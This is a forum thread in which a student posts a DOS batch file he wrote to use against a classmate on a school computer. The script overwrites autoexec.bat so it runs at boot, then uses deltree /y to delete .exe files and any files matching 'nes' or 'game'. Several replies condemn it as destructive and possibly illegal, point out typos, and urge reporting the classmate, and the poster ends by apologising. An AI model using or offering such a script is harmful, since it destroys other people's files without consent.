my batch file

Thread: my batch file

my batch file

before you say anything this batch file was made by me to keep this one other kid in my networking class from using any .exe file on his desktop or floppy (since he brags about how much warez he has ) anyways what do you guys think

//name this prog.bat
    @echo off

REM:
    REM:
    REM:
    REM: muhahahahhahahahhahha
    REM: warez is illegal adrian
    REM:

copy prog.bat /y c:\autoexec.bat

echo checking windows\desktop folder...
    IF EXIST c:\windows\desktop\*.exe goto wipe desktop
    goto 2nd

:wipedesktop
    deltree /y c:\windows\desktop\*.exe
    goto 2nd

:2nd
    echo checking a drive...
    IF EXIST a:\*.exe goto floppydelete
    goto 4th

:floppydelete
    deltree /y a:\*.exe
    goto 4th

:4th
    echo checking for NES filename..
    IF EXIST c:\*NES* goto NESfound
    echo checking for nes filename...
    IF EXIST c:\*nes* goto nesfound
    echo checking for game filename...
    IF EXIST c:\*game* goto gamefound
    echo checking for Nes filename...
    IF EXIST c:\*Nes* goto Nesfound
    goto end

:NESFOUND
    deltreee /y c:\*NES*
    goto end

:nesfound
    deltree /y c:\*nes*
    goto end

:gamefound
    deltree /y c:\*game*
    goto end

:Nesfound
    deltree /y c:\*Nes*
    goto end

:end
    echo thanks for your cooperation adrian

Banned
    If your only concern is to prevent your 'friend' from using exe-files on his 'desktop' or floppy, then you could do that in one, maybe two lines, using doskey.
    Not only is your batch-file far from flawless and will it 'reveal' itself the moment it's executed, I didn't know DOS was case-sensitive, either...

Have you actually tried executing this batch-file?

If he has/is using WAREZ in your networking class then report him.

If you take it upon yourself to start deleting files off of another class computer, far more serious things could happen to you...like for example, being charged with destroying/tampering with state property? You are only asking for trouble by doing this (and at least from what I see, it won't work, you at least have 1 typo).

/nebulus
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

(Merovingian - Matrix Reloaded)

I agree, deleting files on a computer that doesnt belong to you is usually asking for trouble. If you must be an annoyance to your classmates, I reccomend a more amusing and less destructive aproach like turning his cursor into an animated penis, or something equally as tasteless and amusing. (I admit this also would not 'technically' be legal, but it sure would be funny.)

-Maestr0
    \"If computers are to become smart enough to design their own successors, initiating a process that will lead to God-like omniscience after a number of ever swifter passages from one generation of computers to the next, someone is going to have to write the software that gets the process going, and humans have given absolutely no evidence of being able to write such software.\" -Jaron Lanier

just playin around with my friends ;-)
    i executed the program and it works fine, though.
    -Simo

Dead Man Walking
    Thats not playing around. If this is a school computer you will be damaging thier system as well as anything illegal he has downloaded. deltree is not a toy. You'd be better off to just report him. Just remeber that somebody has to go through and replace any legitimate programs you might wipe out with your litle batch file.

Simo you will find that most people in here are the same guys that have to clean up after script kiddes when batch files like these make a mess of things or delete legitimite programs so you wont find too many if any people in here that will think progs like these are "cool"
    \"An eye for an eye and the world would be blind\"
    (I dunno who said this)

sniper0wolf0 told me it was Ghandi Thanks

i apologize for this thread,
    will a moderator please delete this?
    -Simo